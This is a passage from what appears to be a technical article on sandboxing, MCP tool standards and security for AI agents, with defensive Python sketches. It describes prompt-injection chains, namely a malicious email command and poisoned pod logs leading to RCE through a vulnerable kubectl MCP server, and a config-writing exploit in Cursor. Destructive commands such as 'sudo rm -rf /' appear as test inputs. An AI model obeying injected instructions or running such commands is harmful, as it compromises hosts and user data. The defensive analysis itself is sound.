&lt;td&gt;E2B&lt;/td&gt;
&lt;td&gt;Managed cloud sandbox (enterprise agent cloud)&lt;/td&gt;
&lt;td&gt;Sandbox as agent runtime; emphasis on concurrency and execution infrastructure&lt;/td&gt;
&lt;td&gt;&lt;a href="https://e2b.dev/" rel="noopener noreferrer"&gt;E2B&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Daytona&lt;/td&gt;
&lt;td&gt;Daytona&lt;/td&gt;
&lt;td&gt;Managed/platform sandbox infrastructure&lt;/td&gt;
&lt;td&gt;"Stateful infra for AI agents"; ultra-fast creation and isolated execution&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.daytona.io/" rel="noopener noreferrer"&gt;Daytona&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agent Sandbox&lt;/td&gt;
&lt;td&gt;Novita AI&lt;/td&gt;
&lt;td&gt;Managed agent runtime&lt;/td&gt;
&lt;td&gt;Low startup latency, high concurrency; code execution/network access/browser automation&lt;/td&gt;
&lt;td&gt;&lt;a href="https://novita.ai/sandbox" rel="noopener noreferrer"&gt;Novita AI&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sandboxes (Desktop / GUI)&lt;/td&gt;
&lt;td&gt;Bunnyshell&lt;/td&gt;
&lt;td&gt;Firecracker microVM virtual desktop&lt;/td&gt;
&lt;td&gt;For GUI/Computer Use: isolated desktop, VNC/noVNC, desktop automation API&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.bunnyshell.com/sandboxes/" rel="noopener noreferrer"&gt;Bunnyshell&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agent Sandbox on GKE&lt;/td&gt;
&lt;td&gt;Google Cloud (GKE)&lt;/td&gt;
&lt;td&gt;Deploy/run Agent Sandbox controller on GKE&lt;/td&gt;
&lt;td&gt;Isolated execution of untrusted commands in cluster; official installation and usage guide&lt;/td&gt;
&lt;td&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/agent-sandbox" rel="noopener noreferrer"&gt;Google Cloud Documentation&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AgentCore "agent sandbox"&lt;/td&gt;
&lt;td&gt;AWS Bedrock AgentCore&lt;/td&gt;
&lt;td&gt;Console testing sandbox&lt;/td&gt;
&lt;td&gt;AWS docs: test agents in agent sandbox&lt;/td&gt;
&lt;td&gt;&lt;a href="https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/develop-agents.html" rel="noopener noreferrer"&gt;AWS Documentation&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Modal Sandboxes&lt;/td&gt;
&lt;td&gt;Modal&lt;/td&gt;
&lt;td&gt;Modal platform sandbox execution unit&lt;/td&gt;
&lt;td&gt;Official example: build code-executing agent with Modal Sandboxes + LangGraph&lt;/td&gt;
&lt;td&gt;&lt;a href="https://modal.com/docs/examples/agent" rel="noopener noreferrer"&gt;Modal&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Vercel Sandbox&lt;/td&gt;
&lt;td&gt;Vercel&lt;/td&gt;
&lt;td&gt;Vercel managed execution environment (Sandbox product)&lt;/td&gt;
&lt;td&gt;For scalable execution (fluid compute/pay-per-active-CPU, etc.)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://vercel.com/sandbox" rel="noopener noreferrer"&gt;Vercel&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Docker Sandboxes (Experimental)&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Local containerized sandbox (for coding agents)&lt;/td&gt;
&lt;td&gt;Docker official: use local isolated environments to run coding agents, enforce boundaries&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.docker.com/blog/docker-sandboxes-a-new-approach-for-coding-agent-safety/" rel="noopener noreferrer"&gt;Docker&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Agent Sandbox on Kubernetes. The Kubernetes-based Agent Sandbox, spearheaded by Google and open-sourced as a Kubernetes SIG project in late 2025, exemplifies state-of-the-art sandbox design. A sandbox instance is an isolated pod launched per agent session and managed through Kubernetes APIs. Internally it relies on gVisor (a user-space kernel that intercepts syscalls) or Kata Containers (lightweight VM isolation) to provide a robust security boundary. This means even if an agent's code tries to perform a malicious syscall or exploit a kernel bug, it's constrained within a sandbox kernel that has minimal privileges on the host. The sandbox also limits network access by default on GKE (only allowing what's necessary for the agent tools), reducing the risk of an agent scanning internal networks or exfiltrating data. At KubeCon NA 2025, Google showcased how they can schedule thousands of sandbox pods in parallel, thanks to the lightweight nature of gVisor, and how pre-warmed sandbox pools enable sub-second startup latencies even with the isolation. This addresses the performance concern that isolation often introduces: by carefully engineering snapshot/restore and pooling, the overhead can be kept low enough for interactive use.&lt;/p&gt;

&lt;p&gt;From an API standpoint, the Sandbox CRD provides features tailored to long-running agent processes: you can specify resource limits, attach persistent volumes for agent state, and use the Kubernetes scheduler to place sandboxes on appropriate nodes (e.g. ones with GPU if the agent needs it). It also has lifecycle controls like scheduled deletion (to clean up sandboxes after use) and the pause/resume support mentioned earlier. Collectively, these features line up with the mitigations OWASP recommends for agent risks: "system isolation, access segregation, permission management, command validation, and other safeguards". In fact, OWASP added an entry to its Top 10 for LLMs called "Agent Tool Interaction Manipulation" – the risk of an AI agent being induced to misuse its tools or perform unintended actions. The primary defense listed is to run the agent in a locked-down environment with fine-grained permission controls on what it can do. By confining an agent to a Kubernetes sandbox with only specific Kubernetes API access (or none at all beyond its tools) and no broad host access, even a compromised agent has a limited blast radius.&lt;/p&gt;

&lt;p&gt;Local Sandboxing Solutions. Not all organizations use Kubernetes or need cloud-scale multi-tenancy; for individual developers or on-prem deployment, there are lighter-weight sandbox solutions emerging. One notable project is ERA (by BinSquare), which provides a local sandbox for running AI-generated code with "microVM security guarantees plus containers ease of use". ERA uses technologies like krunvm (a libkrun-based microVM runner) under the hood, orchestrated in a way that feels like using Docker containers. The idea is to give developers a quick way to test AI-written scripts safely on their laptop or CI pipeline, without having to set up full Kubernetes. Similarly, some frameworks allow using WebAssembly (Wasm) sandboxes for certain tasks (since Wasm can restrict file and network access for code running within it). The InfoQ article on sandboxing mentions Lightning AI's LitSandbox and a library called container-use as alternatives, which likely explore isolating Python execution or providing wrapper APIs that simulate a sandbox. While these are not yet as standardized as the Kubernetes Agent Sandbox, they indicate a broad interest in making sandboxing accessible across environments.&lt;/p&gt;

&lt;p&gt;Integration with Agent Frameworks. Modern agent frameworks are starting to build in assumptions about sandboxing. For example, LangChain (one of the earliest agent libraries) historically would just execute Python code or bash commands directly on the host, which is obviously dangerous in production. By late 2025, we see frameworks like LangGraph 1.0 (the evolution of LangChain's agent module) emphasizing "durable and safe" execution, and CrewAI (another open-source agent framework) adding features for asynchronous tool execution and monitoring to potentially plug into sandboxed runtimes. Microsoft's Agent Framework integrates with their Azure Foundry services, which likely means an agent's code execution can be routed to a managed sandbox (e.g. an isolated Azure Function or container instance) – in their blog they highlight "enterprise-grade deployment from the beginning", including security and compliance hooks. We also see new tools like Aspire's AI agent isolation module (by Microsoft) which aims to allow developers to run multiple agent instances in parallel without conflict, hinting at port isolation and MCP proxy layers. All these efforts point to execution isolation becoming a default part of agent system design. It's no longer assumed that an agent's code runs in the same process as the host application or with full OS privileges – instead, agents run in a contained, observable slot, much like how web browsers run untrusted JavaScript in a sandboxed process.&lt;/p&gt;

&lt;p&gt;Transactional and Fault-Tolerant Execution. A sophisticated angle to sandboxing is making execution fault-tolerant. If an agent's action fails or does something unwanted, can we roll it back? One recent research prototype, Fault-Tolerant Sandboxing for AI Coding Agents, introduced a transactional file system wrapper for agent execution. It intercepts file system writes and system changes during an agent's tool use, and if the agent misbehaves or a policy violation is detected, the sandbox can roll back to a clean snapshot. In their experiments, 100% of unsafe actions were intercepted and rolled back, at a cost of ~14.5% performance overhead. However, they note a key limitation: this works for local state (files, processes) but not for external side effects. If the agent made a cloud API call that created resources or sent emails, a local rollback doesn't undo those. This is pushing the conversation toward distributed transaction semantics for agents – treating a sequence of tool API calls as a saga that might need compensating actions if aborted. While not solved yet, it's a recognized gap (researchers call for integrating compensating transactions for external tools to truly sandbox at the multi-system level). For now, sandboxing primarily ensures the agent's local environment can be reset to a safe state even if one step goes awry.&lt;/p&gt;
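
&lt;p&gt;The snapshot-and-rollback idea can be approximated with a small Python context manager. This is a deliberately simplified stand-in, not the mechanism from the paper: it copies the whole working directory up front rather than intercepting individual writes, and &lt;code&gt;RollbackOnViolation&lt;/code&gt;, &lt;code&gt;PolicyViolation&lt;/code&gt;, and &lt;code&gt;agent_step&lt;/code&gt; are hypothetical names. It also shares the limitation described above, since it can only restore local files.&lt;/p&gt;

```python
import shutil
import tempfile
from pathlib import Path


class PolicyViolation(Exception):
    """Raised (in this sketch) when a monitor decides the agent step was unsafe."""


class RollbackOnViolation:
    """Snapshot a directory on entry; restore it if the wrapped step raises."""

    def __init__(self, workdir):
        self.workdir = Path(workdir)

    def __enter__(self):
        self._tmp = Path(tempfile.mkdtemp(prefix="snapshot-"))
        self._snapshot = self._tmp / "copy"
        shutil.copytree(self.workdir, self._snapshot)
        return self

    def __exit__(self, exc_type, exc, tb):
        failed = exc_type is not None
        if failed:
            # Discard everything the step wrote and put the snapshot back.
            shutil.rmtree(self.workdir)
            shutil.copytree(self._snapshot, self.workdir)
        shutil.rmtree(self._tmp)
        # Swallow policy violations (already handled); re-raise anything else.
        return failed and issubclass(exc_type, PolicyViolation)


def agent_step(workdir):
    # Hypothetical misbehaving step: clobbers a file, drops a stray one, gets flagged.
    (workdir / "notes.txt").write_text("overwritten by agent")
    (workdir / "junk.bin").write_text("x")
    raise PolicyViolation("write outside the allowed paths")


workdir = Path(tempfile.mkdtemp(prefix="agent-work-"))
(workdir / "notes.txt").write_text("original")

with RollbackOnViolation(workdir):
    agent_step(workdir)

restored = (workdir / "notes.txt").read_text()
leftover = (workdir / "junk.bin").exists()
shutil.rmtree(workdir)
```

&lt;p&gt;An email sent or a cloud resource created inside &lt;code&gt;agent_step&lt;/code&gt; would survive this rollback untouched, which is why the saga-style compensating actions discussed above are needed for external tools.&lt;/p&gt;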

&lt;p&gt;Human Takeover and Hybrid Sandboxes. An intriguing development in sandbox design is support for human-in-the-loop interventions not just via yes/no approval prompts, but via full manual control of the sandbox. The idea is that if an agent reaches a step where it is stuck or needs privileged action (like entering a password or solving a tricky problem), a human operator can seamlessly take over the agent's sandbox session, do what's needed, and then hand control back to the AI. The research prototype AgentBay embodies this concept: it provides a unified isolated session that the AI agent can control via API (e.g. issuing OS commands, browser actions) and that a human can remote into graphically at any moment. AgentBay implements a custom Adaptive Streaming Protocol (ASP) to make this possible with very low latency. Unlike traditional screen sharing (RDP/VNC), ASP dynamically switches between sending high-level commands and video frames, adjusting to network conditions and whether the AI or human is currently in charge. The result is a much smoother experience for the human supervisor, even on weaker networks. In tests, allowing a human to intervene in AgentBay's sandbox improved task success rates by over 48% on complex benchmarks, showing the value of fluid HITL (Human-In-The-Loop) control. This approach directly addresses enterprise needs for control: rather than the agent being a black-box automation that might get stuck, it becomes a cooperative automation that an analyst or engineer can jump into whenever needed, without compromising the isolation or requiring the task to be restarted. We foresee future enterprise agent platforms offering a "panic button" or agent assist mode that spawns a secure VNC/Browser session for an operator, all actions logged, then closes back to autonomous mode.&lt;/p&gt;

&lt;p&gt;In summary, sandboxing in agent systems has evolved into a multi-faceted capability: it's not only about securing the environment (with VMs, syscall filters, network restrictions), but also about managing the agent's lifecycle and state (persistent storage, snapshots, warm pools) and facilitating controlled handoffs (pause/resume and human takeover). The investments by major players – e.g. Google building Agent Sandbox in the open as a Kubernetes SIG project under the CNCF – indicate that these sandboxing techniques will likely become standard infrastructure in cloud platforms. Just as Kubernetes gave us primitives for scalable microservices, we are now getting primitives for safe autonomous agent execution on the cloud and the edge.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Tool Ecosystem and Standardization: From Plugins to MCP
&lt;/h2&gt;

&lt;p&gt;In parallel with sandboxing the runtime, the industry has tackled the tool integration problem for agents. Early agent implementations often hard-coded a set of tools or required developers to write custom "plugin" adapters for each use case. This doesn't scale when enterprises might want agents to access dozens of internal APIs, databases, and third-party services. The last six months have seen a strong push toward standardizing how agents discover and use tools, yielding a more interoperable ecosystem.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Model Context Protocol (MCP) and the AAIF
&lt;/h3&gt;

&lt;p&gt;Model Context Protocol (MCP) has emerged as the de facto standard protocol in this space. As mentioned, MCP defines a client-server schema where the AI agent (client) can list what tools a server offers, call those tools with JSON arguments, and receive results. It also covers things like authentication handshakes (e.g. OAuth flows to let an agent "login" to use a tool on a user's behalf) and streaming responses (for tools that send incremental results). By late 2025, MCP's momentum was cemented by the formation of the Agentic AI Foundation (AAIF) under the Linux Foundation. In December 2025, the Linux Foundation announced AAIF with MCP as a founding contribution alongside OpenAI's AGENTS.md and Block's Goose. The goal is to provide a neutral, open governance home for these agent standards so that no single company controls them. The AAIF launch press release notes that MCP adoption had already exploded: over 10,000 MCP servers published, covering everything from dev tools to Fortune 500 internal integrations, and support built into major AI platforms including Claude, ChatGPT, GitHub Copilot, Google Gemini, VS Code, Cursor, and many others. This is remarkable considering MCP was only open-sourced in late 2024 – it resonated because it addressed an urgent pain point: without it, every AI vendor and every enterprise would be duplicating integrations. By rallying around MCP, the community effectively agreed on a "lingua franca" between agents and tools.&lt;/p&gt;

&lt;p&gt;From an enterprise perspective, MCP brings several benefits:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Interoperability: A tool (say a database query interface) can be implemented once as an MCP server and then used by different agents (Anthropic's, OpenAI's, self-hosted ones) without custom adapters. This has analogies to drivers or connectors in classical software – build it once, use anywhere.&lt;/li&gt;
&lt;li&gt;Security and Auditability: MCP messages are structured (JSON) and typically go through a client library in the agent runtime, where they can be logged and inspected. This makes it easier to audit what the agent asked a tool to do, as opposed to the agent running free-form shell commands that are hard to intercept. The protocol includes a capability advertisement step (the server tells what it can do), which can be checked against policies. It also often requires an auth handshake (e.g. OAuth) for the agent to gain access to the tool on behalf of a user, which means existing identity systems can mediate access.&lt;/li&gt;
&lt;li&gt;Modularity and Future-proofing: As InfoQ summarized, MCP shifts integration from a tangled web into a modular architecture, reducing the "plugin fatigue" problem and making it easier to add new tools or swap out models. It also levels the playing field – small open-source projects can publish MCP servers that become as easily usable as those from big vendors, fostering a community ecosystem of tools.&lt;/li&gt;
&lt;li&gt;Neutral Governance: With AAIF, companies like AWS, Google, Microsoft, Anthropic, and OpenAI are all at the same table (indeed all are listed as platinum members). This reduces the risk that MCP splinters into competing versions; it's likely to become analogous to HTML or SQL – a baseline standard that everyone implements, with maybe some extensions.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It's worth noting that MCP is evolving to cover more than just "traditional API calls." Recent extensions include Agent-to-Agent messaging (so an agent can expose itself as a tool to others via MCP) and binary data support (for image and file transfer). The AGENTS.md standard, also under AAIF, complements MCP by providing a way for software projects to declare to agents how to interact with them. AGENTS.md is essentially a README for AI agents, placed in a code repo to describe the project, its build/test tools, key contexts, and constraints. Over 60k open-source repos have adopted AGENTS.md to guide coding agents. By standardizing this, when an agent (like GitHub Copilot or Cursor) is working on a new codebase, it can automatically read AGENTS.md to understand the project's specific commands (e.g. how to run tests) rather than relying on general knowledge. This reduces errors and makes code-writing agents more reliable across different environments.&lt;/p&gt;

&lt;p&gt;MCP Tool Ecosystem. Many companies and open-source teams have published MCP servers for their systems. For instance, GitHub released an official GitHub MCP Server that exposes GitHub operations (issues, PRs, repo contents, etc.) via MCP. This allows an agent to perform GitHub actions (like creating an issue or commenting on a PR) in a safe way – the server enforces GitHub's API policies and scopes. Similarly, we have MCP servers for databases (SQL tools), cloud resources (AWS, Azure MCP servers), information lookups (Wikipedia, web search), and even OS-level tasks (there are MCP servers that wrap shell commands or Docker). A typical enterprise might run a suite of internal MCP servers: one for their ticketing system, one for their customer database, one for DevOps (Kubernetes control like the &lt;code&gt;mcp-server-kubernetes&lt;/code&gt; we saw). By doing so, they create a catalog of approved tools that their AI agents can use. Some companies are building MCP Gateways or registries to manage this catalog, which we'll discuss in the security section.&lt;/p&gt;

&lt;p&gt;Local-First and Offline Agents. While MCP often assumes a client (agent) connecting to a server over HTTP, it's flexible enough to work in "all local" scenarios too (using stdio pipes). The Goose framework (contributed by Block to AAIF) is described as a "local-first AI agent framework". Goose uses MCP for tool extensions – meaning you can run goose agents on your laptop, and they can spin up local MCP servers for local tools (say, accessing a local filesystem or application) without needing cloud connectivity. This is important for cases where data privacy requires everything to remain on-prem or on-device. It also means an enterprise could package up an agent + tool suite to run entirely in an isolated network (e.g. an AI agent that helps with internal network diagnostics, running in a secure enclave with no internet access, but with MCP hooking into internal systems). The push toward standardization via MCP doesn't imply centralization in the cloud – on the contrary, it can democratize who provides tools (open-source implementations, self-hosted services, etc.) as long as they speak the protocol.&lt;/p&gt;

&lt;p&gt;Beyond MCP: Other Standards. While MCP is currently the frontrunner, there are other noteworthy efforts. OpenAPI-based tool use: some agent frameworks allow importing any OpenAPI spec and will auto-generate an "agent tool" from it. For example, Microsoft's Agent Framework highlights that any REST API with an OpenAPI definition can be instantly turned into a tool, with the framework handling schema parsing and secure invocation. This is complementary to MCP: one could imagine MCP servers automatically exposing an OpenAPI, or vice versa. Another is the concept of capability description languages – OpenAI's Function Calling spec is one example, where the model is told function signatures and it outputs JSON for calls. Some researchers propose more formal schemas for tool affordances. At the moment, however, MCP seems to be converging those threads: it provides a structured way for an agent to query "what can I do?" and then invoke a function with arguments, which is essentially function calling over a channel. It's likely we'll see alignment or bridging between OpenAPI, JSON-RPC, and whatever else emerges, to avoid fragmenting this again.&lt;/p&gt;

&lt;p&gt;In essence, if sandboxing addresses the agent's "body," MCP addresses the agent's "arms and legs". It standardizes how the agent reaches out to interact with the world. This was a necessary step for agents to become truly useful in enterprise settings, because no single vendor can supply every integration. By lowering the integration barrier, companies can leverage a far broader set of tools. However, as we'll discuss next, giving an AI agent access to many tools also broadens the attack surface and governance burden – thus, standardization and security have to go hand in hand.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Security, Governance, and Trust in Agent Systems
&lt;/h2&gt;

&lt;p&gt;Deploying autonomous agents in an enterprise inherently raises the question: how do we trust them? Unlike a deterministic script, an AI agent can come up with unexpected actions, and it might be influenced by inputs (or adversaries) in ways we can't fully predict. Over the past months, a significant focus of both practitioners and researchers has been on closing the "trust gap" – ensuring that agents do what they're supposed to and nothing more, or at least that we can detect and mitigate when they misbehave. Several key themes have emerged: permission and policy models, supply chain security of tools, prompt injection defenses, auditing and observability, and fail-safe mechanisms. We'll examine each in turn.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 Prompt Injection and Confused Deputy Problems
&lt;/h3&gt;

&lt;p&gt;Prompt injection – where an external input is crafted to manipulate the agent's LLM into ignoring its instructions or performing unintended actions – has proven to be a very real threat. In the context of agent tools, prompt injection can become a "confused deputy" attack: the LLM is the deputy that has privileges (access to tools) and the attacker exploits it via crafted input (a prompt) to misuse those privileges. A simple example: an attacker might embed a malicious command in a user-provided email, which the agent then dutifully executes with its shell tool. Real incidents and proofs-of-concept have shown this is not just theoretical. The consensus in discussions (e.g. on Hacker News) is that prompt injection is analogous to XSS (cross-site scripting) in web apps – you cannot fully eliminate it just by sanitizing inputs, because the model's behavior with arbitrary text is hard to constrain. Thus, relying solely on prompt-based safeguards (like "don't execute if user says to do something bad") is brittle.&lt;/p&gt;

&lt;p&gt;The more robust approach is structural: limit what the agent can do even if it's tricked. This means enforcing policy at the tool invocation layer. For instance, if the agent tries to run a shell command, have a policy that disallows &lt;code&gt;rm -rf&lt;/code&gt; or network calls to sensitive endpoints. If it uses a database tool, ensure it cannot query tables it shouldn't. This is where sandboxing and permission models overlap. In a sandbox, you can intercept system calls – e.g. prevent file writes outside a certain directory, or limit network access to only whitelisted domains. With MCP, you can implement an allow-deny policy per tool – e.g. forbid a certain combination of API calls or detect if the arguments look suspicious (like a SQL query that's dumping all user data).&lt;/p&gt;
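
&lt;p&gt;A policy check at the tool invocation layer might look like the sketch below. Everything in it is an assumption made for illustration: the tool names &lt;code&gt;shell&lt;/code&gt; and &lt;code&gt;http_get&lt;/code&gt;, the allowlists, and the function &lt;code&gt;check_tool_call&lt;/code&gt;. It uses allowlists rather than a denylist of commands such as &lt;code&gt;rm -rf&lt;/code&gt;, since a denylist is easy to sidestep, and it denies anything it does not recognize.&lt;/p&gt;

```python
import shlex
from urllib.parse import urlparse

# Hypothetical allowlists; a real deployment would load these from policy config.
ALLOWED_BINARIES = {"ls", "cat", "grep"}
ALLOWED_HOSTS = {"api.internal.example"}


def check_tool_call(tool: str, args: dict) -> tuple:
    """Return (allowed, reason) for a proposed tool call. Default is deny."""
    if tool == "shell":
        try:
            argv = shlex.split(args.get("command", ""))
        except ValueError:
            return False, "unparseable command"
        if not argv:
            return False, "empty command"
        if argv[0] not in ALLOWED_BINARIES:
            return False, f"binary {argv[0]!r} is not on the allowlist"
        # The caller must execute argv directly (no shell), so that
        # metacharacters in later tokens stay inert.
        return True, "ok"
    if tool == "http_get":
        host = urlparse(args.get("url", "")).hostname
        if host not in ALLOWED_HOSTS:
            return False, f"host {host!r} is not on the allowlist"
        return True, "ok"
    return False, f"unknown tool {tool!r}"


print(check_tool_call("shell", {"command": "rm -rf /"}))
print(check_tool_call("http_get", {"url": "https://api.internal.example/v1"}))
```

&lt;p&gt;A check like this complements the sandbox rather than replacing it: the sandbox still has to enforce file and network limits in case the policy layer misses something.&lt;/p&gt;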

&lt;p&gt;One concrete advancement is the AgentBound research framework, which proposes attaching a declarative access control policy to MCP servers. Inspired by Android's app permissions, AgentBound allows a tool to declare what host resources it needs (files, network targets, etc.), and an admin can approve or limit those. At runtime, an enforcement engine monitors the agent's calls and blocks anything outside the allowed scope. Impressively, AgentBound's evaluation auto-generated policies from source code for 296 popular MCP servers with about 80.9% accuracy, and could block the majority of malicious actions with negligible overhead. This suggests that intelligent tooling can help manage the policy burden: we can analyze a tool's code to infer "this tool should only ever need to access X API or Y file", then use that as a sandbox rule.&lt;/p&gt;

&lt;p&gt;Another line of defense is schema validation. Many tools expect inputs of a certain form (JSON with specific fields, numbers in ranges, etc.). If the agent's output deviates, it can indicate either a prompt injection or a model error. Rigorously validating the agent's action format before executing it can catch some attacks or mistakes. In fact, OWASP's recommendation of command validation falls here – e.g. if an agent tries to execute &lt;code&gt;sudo rm -rf /&lt;/code&gt;, the sandbox or tool wrapper should detect that and refuse.&lt;/p&gt;
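
&lt;p&gt;As a rough sketch of this idea, the validator below checks a proposed tool call against a small hand-written schema before anything is executed. The schema format, the &lt;code&gt;get_orders&lt;/code&gt;-style fields, and the function &lt;code&gt;validate_args&lt;/code&gt; are all hypothetical; in practice one would more likely validate against the JSON Schema that the tool itself publishes.&lt;/p&gt;

```python
# Hypothetical schema for an imaginary "get_orders" tool.
SCHEMA = {
    "customer_id": {"type": int, "required": True, "min": 1},
    "limit": {"type": int, "required": False, "min": 1, "max": 100},
}


def validate_args(args: dict, schema: dict) -> list:
    """Return a list of problems; an empty list means the call is well-formed."""
    errors = []
    for key in args:
        if key not in schema:
            errors.append(f"unexpected field: {key}")
    for key, rule in schema.items():
        if key not in args:
            if rule.get("required"):
                errors.append(f"missing field: {key}")
            continue
        value = args[key]
        # Exact type match, so True/False are not accepted where an int is expected.
        if type(value) is not rule["type"]:
            errors.append(f"wrong type for {key}")
            continue
        if "min" in rule and rule["min"] > value:
            errors.append(f"{key} below minimum")
        if "max" in rule and value > rule["max"]:
            errors.append(f"{key} above maximum")
    return errors


print(validate_args({"customer_id": 7, "limit": 10}, SCHEMA))
print(validate_args({"limit": 100000, "cmd": "sudo rm -rf /"}, SCHEMA))
```

&lt;p&gt;Rejecting unexpected fields is deliberate: an extra argument the tool never asked for is a cheap signal that the model was steered off course.&lt;/p&gt;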

&lt;p&gt;It's widely acknowledged that prompt injection cannot be fully solved at the model level, so enterprise systems are layering these runtime controls. Some are even exploring two-model setups: one model generates a plan or interprets user input without any tools (and thus with no privileges), then a separate "execution model" runs with tools enabled but receives a much more constrained input (only the sanitized plan). This is analogous to separating policy decision and policy enforcement. However, this approach is in its infancy – researchers have noted it's tricky to ensure the two models stay in sync and that the first model doesn't inadvertently become a covert channel for bad instructions.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.2 Tool Supply Chain Security
&lt;/h3&gt;

&lt;p&gt;As the MCP tool ecosystem grows, a new class of security concerns appears: the tools themselves may have vulnerabilities or could be malicious. We've effectively extended our "attack surface" to any code that implements a tool API. In July 2025, security researchers disclosed critical flaws in some community-developed MCP servers:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The MCP Server for Kubernetes (an MCP tool that allowed agents to run &lt;code&gt;kubectl&lt;/code&gt; commands on a cluster) had a command injection flaw. It constructed shell commands from user input without sanitization, so an attacker could embed &lt;code&gt;|&lt;/code&gt; or &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; to execute arbitrary commands on the host. Not only that, the advisory demonstrated a prompt injection chain: if an agent was asked to read a pod's logs (which contained malicious instructions), the agent might then call a vulnerable &lt;code&gt;kubectl&lt;/code&gt; tool with those instructions, leading to RCE (Remote Code Execution) on the MCP server host. This is a vivid example of how an innocuous high-level task (read logs) can cascade into a full compromise via weaknesses in the tool implementation. It underscores that agent security is only as strong as the weakest tool in its arsenal.&lt;/li&gt;
&lt;li&gt;Another advisory, for mcp-package-docs (a tool for reading package documentation), described a similar shell injection issue. Essentially, many early tools naively used &lt;code&gt;exec()&lt;/code&gt; on strings, a practice long known to be dangerous in any software context.&lt;/li&gt;
&lt;li&gt;The AI coding assistant Cursor found an even more subtle exploit: an agent could be tricked into writing a malicious MCP server configuration to disk (effectively "installing" a new tool) which would then be loaded and executed, giving the attacker code execution on the system. In response, Cursor had to forbid agents from writing to certain config directories.&lt;/li&gt;
&lt;/ul&gt;
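
&lt;p&gt;The command injection pattern in the first two advisories has a well-known remedy: validate the input, then pass it to the process as a separate argument instead of splicing it into a shell string. The sketch below shows that pattern in Python; it is not the code of any of the servers mentioned, and the name pattern is a simplified stand-in for Kubernetes naming rules. The helper names &lt;code&gt;build_logs_argv&lt;/code&gt; and &lt;code&gt;read_pod_logs&lt;/code&gt; are hypothetical.&lt;/p&gt;

```python
import re
import subprocess

# Simplified stand-in for Kubernetes resource naming rules (assumption).
NAME = re.compile(r"[a-z0-9]([-a-z0-9.]*[a-z0-9])?")


def build_logs_argv(pod: str, namespace: str = "default") -> list:
    """Validate inputs and return an argument vector; no shell string is built."""
    for value in (pod, namespace):
        if not NAME.fullmatch(value):
            raise ValueError(f"invalid name: {value!r}")
    return ["kubectl", "logs", "--namespace", namespace, pod]


def read_pod_logs(pod: str, namespace: str = "default") -> str:
    """Run kubectl without a shell, so pipes and other metacharacters are inert."""
    argv = build_logs_argv(pod, namespace)
    done = subprocess.run(argv, capture_output=True, text=True, check=True, timeout=30)
    return done.stdout


# Vulnerable pattern, shown only as a comment for contrast:
#   subprocess.run(f"kubectl logs {pod}", shell=True)
# With shell=True, a "pod name" carrying a pipe or semicolon runs extra commands.

print(build_logs_argv("web-1"))
```

&lt;p&gt;The two defenses are independent on purpose: even if the name check had a gap, the absence of a shell means the value still reaches &lt;code&gt;kubectl&lt;/code&gt; as a single argument.&lt;/p&gt;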

&lt;p&gt;These incidents highlight supply chain risk: when you install an MCP server from npm or pip, do you know it's safe? Could one of its dependencies be hijacked to steal data? Traditional supply chain best practices – code signing, vetting maintainers, vulnerability scanning – all apply here. But additionally, the dynamic nature of agent tool use requires new thinking. For example, an agent might fetch a tool definition (schema) from somewhere at runtime – that channel could be compromised (a malicious tool listing that lies about what it does). To address this, the community is discussing tool registries with verification. Imagine an "App Store" for MCP tools where each tool is reviewed, sandboxed, and cryptographically signed. The Linux Foundation AAIF might play a role in hosting a global registry, or there may be vendor-specific ones.&lt;/p&gt;

&lt;p&gt;Some researchers call for transparency logs and an "SBOM" (Software Bill of Materials) approach for agent tools. For instance, an enterprise might want a log of every tool version the agent ever used, so if one is later found malicious they can audit past agent runs. They also want assurance that the tool code running is exactly the code that was audited. This is akin to how modern browsers handle extensions: with strict signing and review processes.&lt;/p&gt;
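
&lt;p&gt;One simple way to get the "exactly the code that was audited" guarantee is to pin a cryptographic digest per tool version and refuse anything that does not match. The sketch below assumes a hypothetical pin list &lt;code&gt;AUDITED&lt;/code&gt; and a made-up package name; a real setup would more likely rely on signed releases and a lockfile, with the pin list itself stored somewhere the agent cannot write.&lt;/p&gt;

```python
import hashlib
import hmac

# Hypothetical pin list: (tool name, version) mapped to the audited SHA-256.
# The digest here is computed from placeholder bytes purely for the demo.
AUDITED = {
    ("example-mcp-server", "1.2.0"): hashlib.sha256(b"audited build bytes").hexdigest(),
}


def is_audited(name: str, version: str, artifact: bytes) -> bool:
    """True only if this exact artifact matches the digest recorded at audit time."""
    expected = AUDITED.get((name, version))
    if expected is None:
        return False  # unknown tool or version: default deny
    actual = hashlib.sha256(artifact).hexdigest()
    return hmac.compare_digest(actual, expected)


print(is_audited("example-mcp-server", "1.2.0", b"audited build bytes"))
print(is_audited("example-mcp-server", "1.2.0", b"tampered build bytes"))
```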

